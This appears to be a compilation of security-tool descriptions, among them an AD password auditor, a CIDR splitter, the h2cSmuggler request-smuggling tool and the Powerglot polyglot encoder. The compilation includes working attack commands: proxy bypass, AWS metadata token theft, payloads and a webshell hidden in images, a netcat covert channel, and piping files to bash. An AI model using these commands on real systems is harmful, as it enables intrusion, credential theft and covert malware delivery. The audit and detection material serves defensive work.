    The upside to using the CLI is its ability to be automated. As of now, the output format of the CLI is subject to change. However, here is an example of calling it:

    polypyus-cli --history examples/history/20819-A1.bin --annotation examples/history/20819-A1_patch.elf --history examples/history/20735B1.bin --annotation examples/history/20735B1_patch.elf --project test.sqlite
    polypyus-cli --target examples/history/20739B1.bin --project test.sqlite

    The first command creates test.sqlite as a new project file and imports 20819-A1.bin and 20735B1.bin with their respective patch.elf files. The second invocation reuses the same project file and matches against the binary 20739B1.bin. For each command, the number of --history and --annotation arguments must match. These two commands could also be combined into one by adding the --target argument to the first command.


    How does it work internally?

    We will release a paper soon. Until then, you can take a look into Jan's Master thesis final presentation, which covers the issues encountered when working with conventional binary diffing approaches in ARM Thumb2 mode, and how the alternate binary-only approach works.


    Recommended IDA Workflow

    After some internal testing, we can recommend the following workflow when working with IDA Pro and Polypyus:

    • Create a fresh database. ARM v7 little endian, ARM Cortex M for the Bluetooth firmware.
    • Mark position 0x0 as Thumb (Alt-g, T=0x1).
    • Create ROM and RAM segments. ROM at 0x0 with rx, RAM at 0x200000 with rwx (at least for the Bluetooth firmware).
    • Create vector table offsets in ROM, at least for the reset vector, which is a 4-byte offset at 0x4 (o). On the CYW20735 firmware it points to 0x3bc+1. Go back one byte and create a function (p).
    • Wait for auto analysis to finish.
    • Import Polypyus results.
    • Run the Thumbs Up scripts.
    • Run both BinDiff and Diaphora. The latter ideally in an IDA version with decompiler. Use both, as they use different heuristics.

    ...now your IDA database might be somewhat useful :) Still a lot of things the disassembler fails at within ARM Thumb2 but way better than anything IDA does on its own.



    Lil-Pwny - Auditing Active Directory Passwords Using Multiprocessing In Python



    A multiprocessing approach to auditing Active Directory passwords using Python.


    About Lil Pwny

    Lil Pwny is a Python application to perform an offline audit of NTLM hashes of users' passwords, recovered from Active Directory, against known compromised passwords from Have I Been Pwned. The usernames of any accounts matching HIBP will be returned in a .txt file.

    There are also additional features:

    • Ability to provide a list of your own passwords to check AD users against. This allows you to check user passwords against passwords relevant to your organisation that you suspect people might be using. These are NTLM hashed, and AD hashes are then compared with this as well as the HIBP hashes.
    • Return a list of accounts using the same passwords. Useful for finding users using the same password for their administrative and standard accounts.

    More information about Lil Pwny can be found on my blog


    Recommendations

    This application was developed to ideally run on high resource infrastructure to make the most of Python multiprocessing. It will run on desktop level hardware, but the more cores you use, the faster the audit will run.


    Installation

    Install via pip

    pip install lil-pwny

    Usage

    Lil-pwny will be installed as a global command, use as follows:

    usage: lil-pwny [-h] -hibp HIBP [-a A] -ad AD_HASHES [-d] [-m] [-o OUTPUT]

    optional arguments:
    -hibp, --hibp-path The HIBP .txt file of NTLM hashes
    -a, --a .txt file containing additional passwords to check for
    -ad, --ad-hashes The NTLM hashes from of AD users
    -d, --find-duplicates Output a list of duplicate password users
    -m, --memory Load HIBP hash list into memory (over 24GB RAM
    required)
    -o, --out-path Set output path. Uses working dir when not set

    Example:

    lil-pwny -hibp ~/hibp_hashes.txt -ad ~/ad_ntlm_hashes.txt -a ~/additional_passwords.txt -o ~/Desktop/Output -m -d

    Use of the -m flag will load the HIBP hashes into memory, which will allow for faster searching. Note this will require at least 24GB of available memory.


    Getting input files

    Step 1: Get an IFM AD database dump

    On a domain controller use ntdsutil to generate an IFM dump of your AD domain. Run the following in an elevated PowerShell window:

    ntdsutil
    activate instance ntds
    ifm
    create full **output path**

    Step 2: Recover NTLM hashes from this output

    To recover the NTLM hashes from the AD IFM data, the PowerShell module DSInternals is required.

    Once installed, use the SYSTEM hive in the IFM data to recover the hashes in the format username:hash and save them to the file ad_ntlm_hashes.txt

    $bootKey = Get-BootKey -SystemHivePath '.\registry\SYSTEM'
    Get-ADDBAccount -All -DBPath '.\Active Directory\ntds.dit' -BootKey $bootKey | Format-Custom -View HashcatNT | Out-File ad_ntlm_hashes.txt -Encoding ASCII

    Step 3: Download the latest HIBP hash file

    The file can be downloaded from here

    The latest version of the hash file contains around 551 million hashes.
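
    The audit described above, as an added sketch that is not Lil Pwny's own code: it checks username:hash lines against a hash list by binary search on disk, which is the alternative to loading the list into memory with -m, and it reports accounts that share a password. It assumes the hash file holds HASH:COUNT lines sorted by hash; all hashes and account names below are constructed.

```python
"""Offline NTLM audit sketch: AD `username:hash` lines against a sorted HIBP-style list."""
import os
import tempfile
from collections import defaultdict
from typing import Dict, Iterable, Iterator, List, Optional, Tuple

HEX = set("0123456789ABCDEF")


def lookup_sorted(path: str, ntlm_hex: str) -> Optional[int]:
    """Binary-search a `HASH:COUNT` file sorted by HASH; return COUNT or None."""
    wanted = ntlm_hex.upper().encode()
    with open(path, "rb") as fh:
        lo, hi = 0, os.path.getsize(path)
        while lo < hi:
            mid = (lo + hi) // 2
            if mid:
                fh.seek(mid - 1)
                fh.readline()          # move to the first line starting at or after mid
            else:
                fh.seek(0)
            start = fh.tell()
            line = fh.readline()
            if start >= hi or not line:
                hi = mid               # no line starts inside [mid, hi)
                continue
            key, _, count = line.strip().partition(b":")
            if key.upper() == wanted:
                return int(count or 0)
            if key.upper() < wanted:
                lo = fh.tell()         # the wanted line can only start after this one
            else:
                hi = mid
    return None


def parse_ad_hashes(lines: Iterable[str]) -> Iterator[Tuple[str, str]]:
    """Yield (username, HASH) pairs; blank and malformed lines are skipped."""
    for raw in lines:
        user, sep, digest = raw.strip().rpartition(":")
        if sep and user and len(digest) == 32 and set(digest.upper()) <= HEX:
            yield user, digest.upper()


def audit(ad_lines: Iterable[str], hibp_path: str,
          extra_hashes: Iterable[str] = ()) -> Tuple[Dict[str, int], List[List[str]]]:
    """Return ({user: breach count}, [groups of users sharing one hash])."""
    extra = {h.upper() for h in extra_hashes}
    users_by_hash: Dict[str, List[str]] = defaultdict(list)
    for user, digest in parse_ad_hashes(ad_lines):
        users_by_hash[digest].append(user)
    compromised: Dict[str, int] = {}
    for digest, users in users_by_hash.items():   # one lookup per distinct hash
        count = lookup_sorted(hibp_path, digest)
        if count is None and digest not in extra:
            continue
        for user in users:
            compromised[user] = count or 0         # 0: only on the custom list
    duplicates = sorted(sorted(u) for u in users_by_hash.values() if len(u) > 1)
    return compromised, duplicates


# Constructed sample data: these are placeholder hex strings, not real NTLM hashes.
H1, H2, H3, H4, H5 = "1" * 32, "5" * 32, "A" * 32, "F" * 32, "C" * 32
SAMPLE_HIBP = f"{H1}:3\n{H2}:12345\n{H3}:7\n"
SAMPLE_AD = [f"alice:{H2.lower()}", f"alice-adm:{H2}", f"bob:{H4}",
             f"svc_backup:{H5}", f"dave:{H1}", "", "malformed line"]


def sample_run() -> Tuple[Dict[str, int], List[List[str]]]:
    """Write the constructed hash list to a temp file and audit the sample accounts."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as tmp:
        tmp.write(SAMPLE_HIBP)
    try:
        return audit(SAMPLE_AD, tmp.name, extra_hashes=[H5])
    finally:
        os.unlink(tmp.name)


if __name__ == "__main__":
    print(sample_run())
```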


    Resources


    mapCIDR - Small Utility Program To Perform Multiple Operations For A Given subnet/CIDR Ranges



    Small utility program to perform multiple operations for a given subnet/CIDR ranges.

    The tool was developed to ease load distribution for mass scanning operations. It can be used both as a library and as an independent CLI tool.


    Features
    • Simple and modular code base making it easy to contribute.
    • CIDR distribution for distributed scanning.
    • Stdin and stdout support for integrating in workflows

    Installation:-

    From Source
    ▶ GO111MODULE=auto go get -u github.com/projectdiscovery/mapcidr/cmd/mapcidr

    From Github
    ▶ git clone https://github.com/projectdiscovery/mapcidr.git; cd mapcidr/cmd/mapcidr; go build .; cp mapcidr /usr/local/bin

    Usage:-
    ▶ mapcidr -h

    This will display help for the tool. Here are all the switches it supports.

    Flag      Description                            Example
    -cidr     Single CIDR to process                 mapcidr -cidr 173.0.84.0/24
    -sbc      Slice by CIDR count                    mapcidr -sbc 10
    -sbh      Slice by HOST count                    mapcidr -sbh 10000
    -l        File containing list of CIDRs          mapcidr -l cidr.txt
    -o        File to write output to (optional)     mapcidr -o output.txt
    -silent   Make the output silent                 mapcidr -silent
    -version  Print current version of chaos client  mapcidr -version

    Running mapCIDR

    To get the list of IPs for a given CIDR, use the following command.

    ▶ mapcidr -cidr 173.0.84.0/24
    ▶ echo 173.0.84.0/24 | mapcidr
                       ____________  ___    
    __ _ ___ ____ / ___/ _/ _ \/ _ \
    / ' \/ _ '/ _ \/ /___/ // // / , _/
    /_/_/_/\_,_/ .__/\___/___/____/_/|_| v0.1
    /_/

    projectdiscovery.io

    [WRN] Use with caution. You are responsible for your actions
    [WRN] Developers assume no liability and are not responsible for any misuse or damage.

    173.0.84.0
    173.0.84.1
    173.0.84.2
    173.0.84.3
    173.0.84.4
    173.0.84.5
    173.0.84.13
    173.0.84.14
    173.0.84.15
    173.0.84.16

    Slice by CIDR

    To slice a given CIDR, or a list of CIDRs, into a given number of smaller subnets that are as equal as possible, use the following command.

    ▶ mapcidr -cidr 173.0.84.0/24 -sbc 10 -silent
    ▶ echo 173.0.84.0/24 | mapcidr -sbc 10 -silent
    173.0.84.0/27
    173.0.84.32/27
    173.0.84.64/27
    173.0.84.96/27
    173.0.84.128/27
    173.0.84.160/27
    173.0.84.208/28
    173.0.84.192/28
    173.0.84.240/28
    173.0.84.224/28

    Slice by HOST

    To slice a given CIDR into subnets that each hold an equal number of hosts, use the following command.

    ▶ mapcidr -cidr 173.0.84.0/16 -sbh 20000 -silent
    ▶ echo 173.0.84.0/16 | mapcidr -sbh 20000 -silent
    173.0.0.0/18
    173.0.64.0/18
    173.0.128.0/18
    173.0.192.0/18

    Note: it's possible to obtain a perfect split only when the desired number of slices or hosts per subnet is a power of two. Otherwise the tool will attempt to automatically find the best split strategy to obtain the desired outcome.
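
    The two slicing modes above, as an added standard-library sketch that is not mapCIDR's own code. The halving strategy for counts that are not a power of two and the rounding of the host count down to a power of two are assumptions, chosen because they reproduce the sample outputs shown on this page.

```python
"""Slice a CIDR by subnet count or by host count with the standard library."""
import ipaddress
from typing import List, Union

Network = Union[ipaddress.IPv4Network, ipaddress.IPv6Network]


def split_by_count(cidr: str, n: int) -> List[Network]:
    """Split `cidr` into exactly `n` subnets that together cover the whole range."""
    net = ipaddress.ip_network(cidr, strict=False)
    if not 1 <= n <= net.num_addresses:
        raise ValueError(f"cannot split {net} into {n} subnets")
    # The largest power of two that does not exceed n gives equal-sized subnets.
    bits = n.bit_length() - 1
    subnets = list(net.subnets(prefixlen_diff=bits))
    # Halve subnets from the end of the range until the count reaches n.
    index = len(subnets) - 1
    for _ in range(n - len(subnets)):
        subnets[index:index + 1] = list(subnets[index].subnets(prefixlen_diff=1))
        index -= 1
    return subnets


def split_by_hosts(cidr: str, hosts: int) -> List[Network]:
    """Split `cidr` into equal subnets holding at most `hosts` addresses each.

    Addresses are counted as a plain range; network and broadcast are not excluded.
    """
    net = ipaddress.ip_network(cidr, strict=False)
    if hosts < 1:
        raise ValueError("hosts must be at least 1")
    host_bits = hosts.bit_length() - 1           # round down to a power of two
    new_prefix = max(net.prefixlen, net.max_prefixlen - host_bits)
    return list(net.subnets(new_prefix=new_prefix))


if __name__ == "__main__":
    for subnet in split_by_count("173.0.84.0/24", 10):
        print(subnet)
    for subnet in split_by_hosts("173.0.84.0/16", 20000):
        print(subnet)
```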


    Use mapCIDR as a library

    It's possible to use the library directly in your Go programs. The following code snippet outlines how to divide a CIDR into subnets, how to divide the same CIDR into subnets containing a certain number of hosts, and how to list all IPs in it.

    package main

    import (
        "fmt"

        "github.com/projectdiscovery/mapcidr"
    )

    func main() {
        // Divide the CIDR into two subnets
        subnets1 := mapcidr.SplitN("192.168.1.0/24", 2)
        for _, subnet := range subnets1 {
            fmt.Println(subnet)
        }
        // Divide the CIDR into two subnets containing 128 hosts each
        subnets2 := mapcidr.SplitByNumber("192.168.1.0/24", 128)
        for _, subnet := range subnets2 {
            fmt.Println(subnet)
        }

        // List all ips in the CIDR
        ips, _ := mapcidr.Ips("192.168.1.0/24")
        for _, ip := range ips {
            fmt.Println(ip)
        }
    }

    mapCIDR is made by the projectdiscovery team.



    H2Csmuggler - HTTP Request Smuggling Over HTTP/2 Cleartext (H2C)



    h2cSmuggler smuggles HTTP traffic past insecure edge-server proxy_pass configurations by establishing HTTP/2 cleartext (h2c) communications with h2c-compatible back-end servers, allowing a bypass of proxy rules and access controls.

    See my detailed write-up below for:

    • Technical breakdown of the vulnerability
    • Insecure-by-default services
    • Remediation guidance

    Here: https://labs.bishopfox.com/tech-blog/h2c-smuggling-request-smuggling-via-http/2-cleartext-h2c


    How to test?

    Any proxy endpoint that forwards h2c upgrade headers can be affected. Because h2c is intended to be performed only on cleartext channels, detection on HTTPS services often yields true positives.

    By contrast, HTTP services may result in false positives. For example, h2c-enabled proxies may respond to the upgrade instead of forwarding it to an h2c back end.

    Use the --scan-list option to test one or more web servers to look for affected proxy_pass endpoints. Consider using a list of directories discovered from directory enumeration, such as:

    urls.txt

    https://www.example.com/
    https://www.example.com/api/
    https://www.example.com/auth/
    https://www.example.com/admin/
    https://www.example.com/payments/
    ...omitted for brevity...

    Run h2cSmuggler with the list of endpoints and a total number of threads:

    ./h2csmuggler.py --scan-list urls.txt --threads 5

    Or, an individual test can be performed with:

    ./h2csmuggler.py -x https://www.example.com/api/ --test


    Detecting with other popular tools:

    Exploitation

    Once you have identified an affected endpoint that can be used for tunneling, you can now access or brute-force internal endpoints on the back-end server and provide custom verbs or headers. In the demo below, we demonstrate accessing an internal /flag endpoint by using h2c smuggling to bypass proxy deny rules.

    To remediate, do not forward user-supplied values for Upgrade or Connection headers. See the technical post for additional guidance.
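
    A configuration check for the remediation above, as an added example that is not part of h2cSmuggler: it reads an nginx configuration and reports proxy_pass blocks whose effective proxy_set_header directives copy the client's Upgrade or Connection header to the back end. The sample configuration is constructed, and the simplified tokenizer assumes no '#', ';' or braces inside quoted values or regexes.

```python
"""Flag nginx proxy_pass blocks that forward client-supplied Upgrade/Connection headers."""
import re
from typing import Dict, List

HOP_HEADERS = {"upgrade", "connection"}


def audit_nginx(conf: str) -> List[Dict[str, object]]:
    """Return one finding per proxy_pass block that forwards $http_* hop headers."""
    conf = re.sub(r"#[^\n]*", "", conf)                       # drop comments
    stack = [{"name": "main", "headers": [], "proxy_pass": None}]
    pending = []                                              # blocks to evaluate later
    for text, sep in re.findall(r"([^;{}]*)([;{}])", conf):
        words = text.split()
        if sep == "{":
            stack.append({"name": " ".join(words), "headers": [], "proxy_pass": None})
        elif sep == ";" and words:
            if words[0] == "proxy_pass" and len(words) == 2:
                stack[-1]["proxy_pass"] = words[1]
            elif words[0] == "proxy_set_header" and len(words) >= 3:
                stack[-1]["headers"].append((words[1], " ".join(words[2:])))
        elif sep == "}" and len(stack) > 1:
            block = stack.pop()
            if block["proxy_pass"]:
                pending.append([block] + stack[::-1])         # block, then outer levels
    findings = []
    for chain in pending:
        # nginx inherits proxy_set_header from the outer level only when the
        # current level defines none, so the first level that has any applies.
        effective = next((lvl["headers"] for lvl in chain if lvl["headers"]), [])
        risky = [(name, value) for name, value in effective
                 if name.lower() in HOP_HEADERS and "$http_" in value.lower()]
        if risky:
            findings.append({"block": chain[0]["name"],
                             "proxy_pass": chain[0]["proxy_pass"],
                             "forwarded": risky})
    return findings


# Constructed configuration: /api/ and /admin/ pass the client's values through,
# /ws/ sends fixed values instead.
SAMPLE_CONF = """
server {
    listen 443 ssl;
    location /api/ {
        proxy_pass http://backend:8000;
        proxy_http_version 1.1;
        proxy_set_header Upgrade $http_upgrade;        # client-controlled
        proxy_set_header Connection $http_connection;  # client-controlled
    }
    location /ws/ {
        proxy_pass http://backend:8000;
        proxy_http_version 1.1;
        proxy_set_header Upgrade websocket;            # fixed value
        proxy_set_header Connection "upgrade";
    }
    location /flag { deny all; }
}
server {
    listen 8443 ssl;
    proxy_set_header Upgrade $http_upgrade;            # inherited by /admin/
    location /admin/ { proxy_pass http://backend:8000; }
}
"""

if __name__ == "__main__":
    for finding in audit_nginx(SAMPLE_CONF):
        print(finding)
```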


    Install Instructions

    The only dependency is the Python hyper-h2 library:

    pip3 install h2

    Test Environment and Demo

    The test environment will allow you to experiment with h2cSmuggler in a controlled environment. docker-compose will simulate three chains of proxies that lead to an h2c-enabled Golang back end:

    TCP port: Description
    ======== ===========
    8000: HTTP h2c backend
    8001: HAProxy -> h2c backend (Insecure default configuration)
    8002: nginx -> h2c backend (Insecure custom configuration)
    8003: Nuster -> HAProxy -> h2c backend (Insecure configuration with multiple layers of proxies)

    [1] Generate Certificates and spin up the environment with docker-compose:

    # Generate certs
    ./configs/generate-certificates.sh

    # Activate services
    docker-compose up

    All of the proxies deny access to the /flag endpoint accessible on the h2c back end. Let's attempt to access the forbidden endpoint via the HAProxy server running on port 8001:


     

    We can use h2cSmuggler to confirm the proxy's insecure configuration using --test (or -t):


     

    Now, let's use h2cSmuggler to perform an h2c upgrade, tunnel our HTTP/2 traffic through the proxy, and request the /flag endpoint from the back end, bypassing the proxy's access control:


     

    For a deeper explanation of what is happening, check out the technical writeup.


    Usage

    h2cSmuggler uses a familiar curl-like syntax for describing the smuggled request:

    usage: h2csmuggler.py [-h] [--scan-list SCAN_LIST] [--threads THREADS] [--upgrade-only] [-x PROXY] [-i WORDLIST] [-X REQUEST] [-d DATA] [-H HEADER] [-m MAX_TIME] [-t] [-v]
    [url]

    Detect and exploit insecure forwarding of h2c upgrades.

    positional arguments:
    url

    optional arguments:
    -h, --help show this help message and exit
    --scan-list SCAN_LIST
    list of URLs for scanning
    --threads THREADS # of threads (for use with --scan-list)
    --upgrade-only drop HTTP2-Settings from outgoing Connection header
    -x PROXY, --proxy PROXY
    proxy server to try to bypass
    -i WORDLIST, --wordlist WORDLIST
    list of paths to bruteforce
    -X REQUEST, --request REQUEST
    smuggled verb
    -d DATA, --data DATA smuggled data
    -H HEADER, --header HEADER
    smuggled headers
    -m MAX_TIME, --max-time MAX_TIME
    socket timeout in seconds (type: float; default 10)
    -t, --test test a single proxy server
    -v, --verbose

    Examples

    1. Scanning a list of URLs (e.g., https://example.com:443/api/, https://example.com:443/payments, https://sub.example.com:443/) to identify proxy_pass endpoints that are susceptible to smuggling (be careful with thread counts when testing a single server):

    ./h2csmuggler.py --scan-list urls.txt --threads 5

    2. Sending a smuggled POST request past https://edgeserver to an internal endpoint:

    ./h2csmuggler.py -x https://edgeserver -X POST -d '{"user":128457, "role": "admin"}' -H "Content-Type: application/json" -H "X-SYSTEM-USER: true" http://backend/api/internal/user/permissions

    3. Brute-forcing internal endpoints (using HTTP/2 multiplexing), where dirs.txt represents a list of paths (e.g., /api/, /admin/).

    ./h2csmuggler.py -x https://edgeserver -i dirs.txt http://localhost/

    4. Exploiting Host header SSRF over h2c smuggling (e.g., AWS metadata IMDSv2):

    Retrieving the token:

    ./h2csmuggler.py -x https://edgeserver -X PUT -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" http://169.254.169.254/latest/api/token

    Transmitting the token:

    ./h2csmuggler.py -x https://edgeserver -H "x-aws-ec2-metadata-token: TOKEN" http://169.254.169.254/latest/meta-data/

    5. Spoofing an IP address with the X-Forwarded-For header to access an internal dashboard:

    ./h2csmuggler.py -x https://edgeserver -H "X-Forwarded-For: 127.0.0.1" -H "X-Real-IP: 172.16.0.1" http://backend/system/dashboard

    FAQ

    Q: Why are there multiple responses from the server?

    A: The first response is the data response to the original upgrade request initiated in HTTP/1.1, per the h2c upgrade protocol. The following responses are from the smuggled request.

    Q: I received a "101 Switching Protocols" but I'm not receiving any data from the remote server.

    A: I observed this behavior in my tests and found that some servers respond with a 101 status even if they do not actually support HTTP/2.

    Q: Is establishing an h2c tunnel always a vulnerability?

    A: No. Consider a TLS-terminating TCP load balancer (e.g., ELB) proxying directly to an h2c-compatible back end. Although you may be able to establish an h2c connection, if there are no access controls being enforced, then there are no access controls to bypass, or privilege gained by initiating this tunnel.

    Q: Why does the smuggled request URI require a scheme? What is it used for?

    A: The HTTP/2 protocol requires a :scheme pseudo-header. For our use case, http vs. https likely doesn't matter. For more details, see HTTP/2 RFC: Section 8.1.2.3.

    Q: What should I use as the hostname for the back-end server?

    A: It's best to start with the same hostname as the edge server. Next, try experimenting with alternative hostname values.


    Author

    Twitter: @theBumbleSec

    GitHub: the-bumble



    Pastego - Scrape/Parse Pastebin Using GO And Expression Grammar (PEG)



    Scrape/Parse Pastebin using GO and grammar expression (PEG).


    Installation

    $ go get -u github.com/notdodo/pastego


    Usage

    Search keywords are case sensitive

    pastego -s "password,keygen,PASSWORD"

    You can use boolean operators to reduce false positives

    pastego -s "quake && ~earthquake, password && ~(php || sudo || Linux || '<body>')"

    This command searches for bins that contain quake but not earthquake, and for bins that contain password but none of php, sudo, Linux or <body>.

    usage: pastego [<flags>]

    Flags:
    --help Show context-sensitive help (also try --help-long and --help-man).
    -s, --search="pass" Strings to search, i.e: "password,ssh"
    -o, --output="results" Folder to save the bins
    -i, --insensitive Search for case-insensitive strings

    Supported expression/operators:

    `&&` - and

    `||` - or

    `~` - not

    `'string with space'`

    `(myexpression && 'with operators')`
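
    How such expressions can be evaluated against a paste, as an added example that is not pastego's PEG grammar or code: a small recursive-descent evaluator for the operators listed above, run on the query from the usage section. The precedence (~ binds tighter than &&, which binds tighter than ||), the substring matching and the sample texts are assumptions.

```python
"""Evaluate pastego-style search expressions (&&, ||, ~, quotes, parentheses) on text."""
import re
from typing import Callable, List, Optional

TOKEN = re.compile(r"\s*(&&|\|\||~|\(|\)|'[^']*'|[^\s&|~()']+)")
Predicate = Callable[[str], bool]


def tokenize(expr: str) -> List[str]:
    tokens, pos, expr = [], 0, expr.strip()
    while pos < len(expr):
        match = TOKEN.match(expr, pos)
        if not match:
            raise ValueError(f"unexpected input at {pos}: {expr[pos:]!r}")
        tokens.append(match.group(1))
        pos = match.end()
    return tokens


def compile_expr(expr: str, insensitive: bool = False) -> Predicate:
    """Compile one expression into a function that tests a text."""
    tokens = tokenize(expr)
    pos = 0

    def peek() -> Optional[str]:
        return tokens[pos] if pos < len(tokens) else None

    def take() -> str:
        nonlocal pos
        if pos >= len(tokens):
            raise ValueError("unexpected end of expression")
        pos += 1
        return tokens[pos - 1]

    def parse_or() -> Predicate:
        terms = [parse_and()]
        while peek() == "||":
            take()
            terms.append(parse_and())
        return lambda text: any(term(text) for term in terms)

    def parse_and() -> Predicate:
        terms = [parse_unary()]
        while peek() == "&&":
            take()
            terms.append(parse_unary())
        return lambda text: all(term(text) for term in terms)

    def parse_unary() -> Predicate:
        tok = take()
        if tok == "~":
            inner = parse_unary()
            return lambda text: not inner(text)
        if tok == "(":
            inner = parse_or()
            if take() != ")":
                raise ValueError("expected ')'")
            return inner
        if tok in ("&&", "||", ")"):
            raise ValueError(f"unexpected {tok!r}")
        word = tok[1:-1] if tok.startswith("'") else tok   # strip quotes
        if insensitive:
            word = word.lower()
            return lambda text: word in text.lower()
        return lambda text: word in text

    predicate = parse_or()
    if peek() is not None:
        raise ValueError(f"unexpected {peek()!r}")
    return predicate


def matching_searches(query: str, text: str, insensitive: bool = False) -> List[str]:
    """Return the comma-separated sub-expressions of `query` that match `text`."""
    parts = [p.strip() for p in query.split(",") if p.strip()]
    return [p for p in parts if compile_expr(p, insensitive)(text)]


PAGE_QUERY = "quake && ~earthquake, password && ~(php || sudo || Linux || '<body>')"

if __name__ == "__main__":
    for sample in ("quake 3 arena keygen", "earthquake report", "<?php $password = 'x';"):
        print(repr(sample), "->", matching_searches(PAGE_QUERY, sample))
```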

    Keybindings

    q, ctrl+c: quit pastego

    k, : show previous bin

    j, : show next bin

    n: jump forward by 15 bins

    p: jump backward by 15 bins

    N: move to the next block of findings (in alphabetical order)

    P: move to the previous block of findings (in alphabetical order)

    d: delete file from file system

    HOME: go to top


    Requirements

    goquery

    go get -u "github.com/PuerkitoBio/goquery"


    kingpin

    go get -u "gopkg.in/alecthomas/kingpin.v2"


    gocui

    go get -u "github.com/jroimartin/gocui"

    To create the code from PEG use pigeon:

    go get -u github.com/mna/pigeon


    Disclaimer

    You need a PRO account to use this: pastebin will block/blacklist your IP.

    pastebin PRO


    Or....
    • increase the time between each request
    • create a script to restart your router when pastebin warns you

    In progress...

    Add flag to pass/read a list of proxies to avoid IP ban/throttle for free users



    Powerglot - Encodes Offensive Powershell Scripts Using Polyglots



    Powerglot encodes several kinds of scripts using polyglots, for example offensive PowerShell scripts. No loader is needed to run the payload.

    In red-team exercises and offensive tasks, payloads are usually masked using steganography, especially to evade network-level protections; scripts written in PowerShell are among the most common payloads. Recent malware and APTs make use of some of these capabilities: APT32, APT37, Ursnif, Powload, LightNeuron/Turla, Platinum APT, Waterbug/Turla, Lokibot, The dukes (operation Ghost), Titanium, etc.

    Powerglot is a multifunctional and multi-platform attack and defense tool based on polyglots. It lets you mask a script (PowerShell, shell script, PHP, ...) mainly in a digital image, although other file formats are in progress. Unlike the usual offensive tools or malware, Powerglot does not need any loader to execute the hidden information, minimizing the noise on the target system.

    Powerglot has a clear utility in offensive tasks, but it is also intended as a discovery and blue-team tool. To our knowledge, it is the first general and complete open-source tool for searching for information masked with polyglots, information that could be used to achieve persistence in a system or to hide malware (stego-malware, privilege escalation, lateral movement, reverse shell, etc.).


    Features:

    • Encode PowerShell/shell script/PHP/... in a polyglot image. No loader is necessary to recover or execute the hidden information (payload). Powerglot works with several formats, mainly JPEG and PDF. Other formats are in progress.
    • Powerglot is a complete open-source tool to detect (malicious) polyglots, especially the output of public tools such as Truepolyglot or Stegosploit. It works with several formats: JPEG, PNG, GIF, BMP, ZIP, PDF, MP3, etc.

    Installation
    # git clone https://github.com/mindcrypt/powerglot
    # python3 powerglot

    Usage & Parameters

    Some examples to hide payloads using polyglots with Powerglot

    # Example 1 - Hiding a powershell/php/shell script in a JPEG image

    # python3 powerglot.py -o payload.ps1 cat.jpg cat-hidden1.jpg
    # python3 powerglot.py -o webshell.php cat.jpg cat-hidden2.jpg
    # python3 powerglot.py -o shell.sh cat.jpg cat-hidden3.jpg

    # Example 2 - Hiding a shell script (linenum.sh) for privilege escalation in a JPEG image

    # python3 powerglot.py -o linenum.sh cat.jpg cat-linenum.jpg
    # file cat-linenum.jpg (It is a valid JPEG file)
    # feh cat-linenum.jpg (The image is displayed properly in an image viewer)

    # We can execute the script in several ways:

    a) cat cat-linenum.jpg | bash
    b) chmod +x cat-linenum.jpg; ./cat-linenum.jpg

    # Example 3 - Hiding a covert channel with netcat in a JPEG image

    # Attacker
    # echo "nc 127.0.0.1 4444" > netcat.sh
    # python3 powerglot.py -o netcat.sh cat.jpeg cat-netcat.jpeg
    # nc -nvlp 4444

    # Victim
    # chmod +x cat-netcat.jpeg; ./cat-netcat.jpeg


     

    # Example 4 - Polyglot in PDF (e.g. linenum.sh)
    # Create b64.sh with your favourite payload
    base64 Linenum.sh -w 0 > b64.sh
    # Edit b64.sh
    echo "code in b64.sh" | base64 -d | bash;

    # python3 powerglot.py -o b64.sh sample.pdf test.pdf
    # file test.pdf
    # xpdf test.pdf

    # Execute payload
    # cat test.pdf | bash or chmod +x test.pdf; ./test.pdf

    # Example 5 - Powershell in JPEG (polyglot)
    # python3 powerglot.py -o script.ps1 cat.jpeg cat-ps.jpeg
    # file cat-ps.jpeg
    # feh cat-ps.jpeg

    # Execute payload (example)
    # cat cat-ps.jpeg | pwsh

    PS /home/alfonso/PowerGlot/POWERSHELL> get-process;<#hola <# mundo#>

    NPM(K) PM(M) WS(M) CPU(s) Id SI ProcessName
    ------ ----- ----- ------ -- -- -----------
    0 0,00 2,70 0,00 830 829 (sd-pam)
    0 0,00 0,00 0,00 75 0 acpi_thermal_pm
    0 0,00 4,80 0,00 1217 854 agent
    0 0,00 1,70 0,00 748 748 agetty
    0 0,00 40,77 1,01 1198 854 applet.py
    0 0,00 6,29 0,00 938 938 at-spi-bus-launcher
    0 0,00 6,61 5,64 953 938 at-spi2-registryd
    0 0,00 0,00 0,00 131 0 ata_sff
    0 0,00 1,77 0,00 8906 …78 atom
    0 0,00 218,81 585,95 8908 …78 atom
    0 0,00 236,18 176,24 8947 …78 atom
    0 0,00 142,14 2,51 9009 …78 atom
    0 0,00 81,54 3,32 8932 …78 atom --type=gpu-process --enable-features=SharedArrayBuffer -…
    0 0,00 39,44 0,01 8910 …78 atom --type=zygote --no-sandbox
    0 0,00 5,62 0,11 1370 …70 bash
    0 0,00 5,36 0,66 5278 …78 bash
    0 0,00 6,34 1,48 6778 …78 bash
    0 0,00 0,00 0,00 68 0 blkcg_punt_bio
    0 0,00 46,73 2,20 1199 854 blueman-applet
    0 0,00 50,25 1,64 1301 854 blueman-tray

    Some examples to detect polyglots in our filesystem

    #python3 powerglot.py -d ./
    --= [Detecting polyglots] --=
    ..............................................................
    [Suspicious file]-[ ./cat-end-extra2.jpg ]..
    [Suspicious file]-[ ./cat-end-extra3.jpg ][Polyglot Stegosploit][EOF Signature: */ -->]
    .................................................................................
    [Suspicious file]-[ ./cat-end-extra1.jpg ]..

    Future work. Doing
    • We are working to support different file formats for encoding information in polyglots. Currently, we support several techniques in JPEG and PDF.
    • We are working to incorporate rules for the detection of polyglots in different formats. Currently, the presence of StegoSploit in JPEG files is detected (added */ --> after FFD9)
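
    The JPEG check mentioned in the last item, as an added example that is not Powerglot's own code: it walks the marker segments to find the real End Of Image marker (FFD9), then reports any bytes appended after it and whether they contain the */ --> signature. The sample bytes are a constructed marker stream rather than a decodable picture, and trailing data is treated as a triage signal, since some benign files also carry it.

```python
"""Find bytes appended after a JPEG's End Of Image marker (polyglot triage)."""
from typing import Dict

STEGOSPLOIT_TAIL = b"*/ -->"   # signature the page says is looked for after FFD9


def jpeg_end_offset(data: bytes) -> int:
    """Walk the marker segments and return the offset just past EOI, or -1."""
    if data[:2] != b"\xff\xd8":                       # SOI
        return -1
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            return -1
        marker = data[pos + 1]
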